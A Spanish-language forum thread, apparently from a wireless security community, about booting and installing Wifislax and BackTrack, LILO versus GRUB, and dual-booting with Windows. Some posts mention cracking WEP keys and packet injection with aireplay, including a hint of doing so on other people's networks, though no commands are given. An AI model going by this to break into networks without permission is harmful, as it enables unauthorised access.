Yo tambien prefiero el grub, para proximas versiones quitaremos el lilo y meteremos el grub, es mas ya hay un modulo en la pagina del slax sobre el grub.

Pero de momento tiraremos con el lilo para solo la live y el win.

Ahora si se tienen mas linux y tienen grub, pues lo que tu dices.

Pero porque root=/dev/sda4, ah vale logico cada uno la tiene donde la tiene.

Lo cual me lleva a la cabeza que el wifislax se puede instalar en usb de forma mut facil.

Se instala mediante el instalador y luego se crea el lilo.conf poniendo la usb que le toque.

Y listo calixto.

rh3nt0n
Administrador
*

« Respuesta #27 : 11-Diciembre 12:20:25 pm (Lunes) »

exacto

tengo en mente comprarme un pendrive de 6 gigas .. Tongue

saludos

Hwagm
Administrador
*

« Respuesta #28 : 11-Diciembre 13:04:27 pm (Lunes) »

Mierda de pcs que tengo. Que ni de coña arrancan por usb, aunque voy a ver ahora mismo la bios.

Para reyes me pido un portatil eso lo tengo claro, aunque sea lo que telefonica da por 700 euros  Grin Grin Grin

Lo malo es que iba a estar las 24 horas conectados a inet, jajajajaj

NO no penseis mal, aqui hay varios wifi gratis de esos, jejeje

Y en el curro tambien hay wifi, jejejejej, pero con el royo de los sistemas de auntentificacion de WInnndows 2000 Server.

Voy a inyectar un ratito  Cheesy

Elena_FranciX
Moderador

Mordedor@

« Respuesta #29 : 11-Diciembre 13:19:14 pm (Lunes) »

Supongo que sabeis (conoceis) y suponeis, que migrar de LiLo a Grub es fácil

Lo cual resuelve el problema planteado  ¿sabeis como?

Pos el que ande interesado que pregunte...

Pos claro que los sectores de arranque se escriben en MBR, siempre... sino no arranca, Windows quiere "C:\" el arranque para él, si instalas Linux y despues Windows, veras como Win (el MBR) se cepilla El gestor de arranqe de Linux (Grub/Lilo), si lo haces al reves, Linux que es tan considerado respetara la instalación de Windows...

En mi caso actual el Troppix tuneado (je) gestiona a Windows y Troppix (ahora no tengo B|T, me carga mucho KDE) ya veremos la "ñapa" que nos presenta er "jefe"  Grin (espero que no lo presente el día 28-Dic-2006)

De momento ando a leches con el cableado (brrr) y las antenas, creo que me ire a compar un bote de patatas Pringles, o unas chapas de cobre para el viejo plato del Satelite...  Huh
rh3nt0n
Administrador
*

« Respuesta #30 : 11-Diciembre 13:36:21 pm (Lunes) »

si quereis saber sobre GRUB ...
http://bulma.net/beowulf/grub_bulma/

tan sencillo como leerse eso Smiley

saludos

okzyd
*

« Respuesta #31 : 05-Enero 01:15:39 am (Viernes) »

Despues de instalarlo en el pc, se puede traducir al español??

Gracias
Hwagm
Administrador
*

« Respuesta #32 : 05-Enero 03:14:22 am (Viernes) »

si quereis saber sobre GRUB ...
http://bulma.net/beowulf/grub_bulma/

tan sencillo como leerse eso Smiley

saludos

pues no hace tiempo que tengo eso ptepara leer, juax me va a dar algo

maxboy34
*

« Respuesta #33 : 27-Abril 16:30:35 pm (Viernes) »

Hola buenas tengo una duda tonta yo tengo instalado el windows vista si ejecuto el backtrack 2 final y hago particiones habra algun problema con el windows vista?

pd:el backtrack 2 ya tiene todas las utilidades para poder descifrar claves WEB? y si no es asin decirme porfavor cuales me tengo que bajar para tenerlo a punto.

saludos y gracias
uNbAs
Administrador
*

« Respuesta #34 : 28-Abril 11:21:14 am (Sábado) »

Lleba todo lo necesario para la seguridad wireless por eso no te preocupes ... pero ... por lo del windows vista ... no se por q me da q no te va a ir ... pero prueba por siaca

Cada cosa en su sitio y un sitio para cada cosa
Usa la busqueda
skynet
*

« Respuesta #35 : 20-Julio 17:00:29 pm (Viernes) »

Smiley Hola Elena_FranciX me podrias explicar mejor eso del crakeado de una WEP de 128 bits en 15 minutos, ya que he intentado hacerlo como tu lo indicas en uno de tus post, pero al momento de ejecutar el aireplay me manda errores como son "BSSID no encontrado" o "o que la direccion MAC no esta correcta" no entiendo que pasa y eso que tengo una tarjeta con chipset Atheros como la que tu indicas en el post, o sea, ath0.

O bien en donde puedo encontrar informacion sobre esto, por cierto tambien puedo utlizar el Wifislax  Huh ya que me han comentado que es similar y que trae las mismas herramientas que el B|T.

De antemano te lo agradeceré mucho.

GRACIAS...  Grin Cheesy Cheesy
βerni69
... Erasing ...
Moderador Global

yo? ya estaba así cuando llegué xD

« Respuesta #36 : 20-Julio 17:25:09 pm (Viernes) »

si que puedes usar wifislax y tambien el wifiway que son las dos distros de la casa, por cierto yo usaria el wifislax ya que lleva los drivers y los programas tambien  Wink

Saludos

Errar es humano, pero para liar las cosas de verdad se necesita un ordenador

www.bitsdelocos.es/
Páginas: 1 Ir Arriba Imprimir 
« anterior próximo »
Ir a:  

Ingresar con nombre de usuario, contraseña y duración de la sesión